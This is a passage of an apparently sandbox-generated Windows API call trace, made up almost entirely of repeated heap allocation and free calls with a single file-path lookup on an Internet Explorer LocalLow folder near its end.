out: hHeap=0x6a0000) returned 1 [0196.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.658] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0196.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 